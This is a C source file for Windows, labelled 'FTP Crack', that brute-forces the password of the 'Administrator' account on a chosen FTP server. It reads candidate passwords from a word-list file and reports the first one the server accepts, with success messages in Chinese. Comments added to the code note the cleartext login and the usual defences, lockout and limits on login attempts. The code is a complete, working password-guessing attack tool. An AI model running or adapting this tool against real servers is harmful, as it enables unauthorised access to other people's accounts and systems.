// 2019/11/28 FTP Crack
// Brute-force cracking of an FTP server login
#include <WinSock2.h>
#include <windows.h>
#include <WS2tcpip.h>
#include <stdlib.h>
#include <stdio.h>
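/* MSVC linker directives: import libraries this program is linked against. */
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "Mswsock.lib")
#pragma comment (lib, "AdvApi32.lib")

/* Size in bytes of the send and receive buffers used in main(). */
#define DEFAULT_BUFLEN 512
/* FTP control-connection port, passed to getaddrinfo() as the service string. */
#define DEFAULT_PORT "21"
/* FTP reply code 331: user name accepted, password required. */
#define FTP_USER_OK "331"
/* FTP reply code 230: user logged in. */
#define FTP_PASS_OK "230"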
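/*
 * Receive one chunk of a server reply and NUL-terminate it.
 *
 * At most buflen - 1 bytes are read so the terminator always fits. The
 * reply text is controlled by the remote server, and the caller scans it
 * with strstr(), which must never run past the received bytes or pick up
 * stale data from an earlier reply.
 *
 * Returns whatever recv() returned (byte count, 0, or SOCKET_ERROR).
 */
static int recv_text(SOCKET s, char *buf, int buflen)
{
    int n = recv(s, buf, buflen - 1, 0);

    buf[n > 0 ? n : 0] = '\0';
    return n;
}

/*
 * Usage: <program> ftp-server password-txt
 *
 * Connects to the FTP control port (DEFAULT_PORT) of argv[1], then reads
 * whitespace-delimited candidates from the file argv[2]. Each loop
 * iteration sends "USER Administrator" followed by "PASS <candidate>" on
 * the same connection and stops at the first reply containing FTP_PASS_OK,
 * at the end of the word list, or on a socket error.
 *
 * Returns 1 on a usage, Winsock, connection or file-open error and 0
 * otherwise (also when no candidate was accepted).
 *
 * What this looks like on the server side: one client, one control
 * connection, a fixed account name and a run of rejected PASS commands.
 * Credentials travel in cleartext. Per-account lockout, a cap on login
 * attempts per connection or source address, and alerting on bursts of
 * failed logins are the usual controls against this pattern.
 */
int __cdecl main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    struct addrinfo *result = NULL, *ptr = NULL, hints;
    char recvbuf[DEFAULT_BUFLEN];
    char sendbuf[DEFAULT_BUFLEN] = { 0 };
    char password[40] = { 0 };
    FILE *fp = NULL;
    int iResult;
    int recvbuflen = DEFAULT_BUFLEN;

    /* Validate the command line. */
    if (argc != 3) {
        fprintf(stderr, "usage: %s ftp-server password-txt\n", argv[0]);
        return 1;
    }

    /* Winsock must be initialised before any other socket call. */
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        fprintf(stderr, "WSAStartup failed with error: %d\n", iResult);
        return 1;
    }

    ZeroMemory(&hints, sizeof(hints));
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    iResult = getaddrinfo(argv[1], DEFAULT_PORT, &hints, &result);
    if (iResult != 0) {
        fprintf(stderr, "getaddrinfo failed with error: %d\n", iResult);
        WSACleanup();
        return 1;
    }

    /* Try each resolved address until one accepts the connection. */
    for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
        ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
                               ptr->ai_protocol);
        if (ConnectSocket == INVALID_SOCKET) {
            /* WSAGetLastError() returns int, so the conversion is %d. */
            fprintf(stderr, "socket failed with error: %d\n", WSAGetLastError());
            freeaddrinfo(result);
            WSACleanup();
            return 1;
        }

        iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
        if (iResult == SOCKET_ERROR) {
            closesocket(ConnectSocket);
            ConnectSocket = INVALID_SOCKET;
            continue;
        }
        break;
    }
    freeaddrinfo(result);

    if (ConnectSocket == INVALID_SOCKET) {
        fprintf(stderr, "Unable to connect to server!\n");
        WSACleanup();
        return 1;
    }

    /* Open the word list; release the socket and Winsock if that fails. */
    fp = fopen(argv[2], "r");
    if (fp == NULL) {
        fprintf(stderr, "%s 无法打开\n", argv[2]);
        closesocket(ConnectSocket);
        WSACleanup();
        return 1;
    }

    DWORD StartTime = GetTickCount();
    DWORD EndTime = 0;

    do {
        /* Read the server's pending message (the 220 greeting on the first pass). */
        iResult = recv_text(ConnectSocket, recvbuf, recvbuflen);
        if (iResult < 0) {
            fprintf(stderr, "recv error\n");
            break;
        }

        /* The account name is fixed. */
        snprintf(sendbuf, sizeof sendbuf, "USER %s\r\n", "Administrator");
        /* NOTE(review): the length includes the terminating NUL, as in the original. */
        iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf) + 1, 0);
        if (iResult < 0) {
            fprintf(stderr, "send error\n");
            break;
        }

        iResult = recv_text(ConnectSocket, recvbuf, recvbuflen);
        if (iResult < 0) {
            fprintf(stderr, "recv error\n");
            break;
        }

        /*
         * Next candidate from the word list. The field width keeps the token
         * inside password[40]; a longer token is split across reads instead
         * of overflowing the buffer.
         */
        if (fscanf(fp, "%39s", password) != 1) {
            fprintf(stderr, "破解失败\n");
            break;
        }

        /*
         * Was the user name accepted? The code is matched as a substring
         * anywhere in the reply, not anchored to the start of the line.
         */
        if (strstr(recvbuf, FTP_USER_OK) != NULL) {
            /* "PASS " + at most 39 characters + CRLF fits in sendbuf. */
            snprintf(sendbuf, sizeof sendbuf, "PASS %s\r\n", password);
            iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf) + 1, 0);
            if (iResult < 0) {
                fprintf(stderr, "send error\n");
                break;
            }

            iResult = recv_text(ConnectSocket, recvbuf, recvbuflen);
            if (iResult < 0) {
                fprintf(stderr, "recv error\n");
                break;
            }

            /* Was the password accepted? */
            if (strstr(recvbuf, FTP_PASS_OK) != NULL) {
                printf("破解成功\n");
                printf("密码: %s\n", password);
                /* Elapsed time in milliseconds since the word list was opened. */
                EndTime = GetTickCount() - StartTime;
                printf("用时: %.2fs\n", (float)EndTime / 1000);
                break;
            }
        }
    } while (iResult > 0);

    fclose(fp);
    closesocket(ConnectSocket);
    WSACleanup();
    return 0;
}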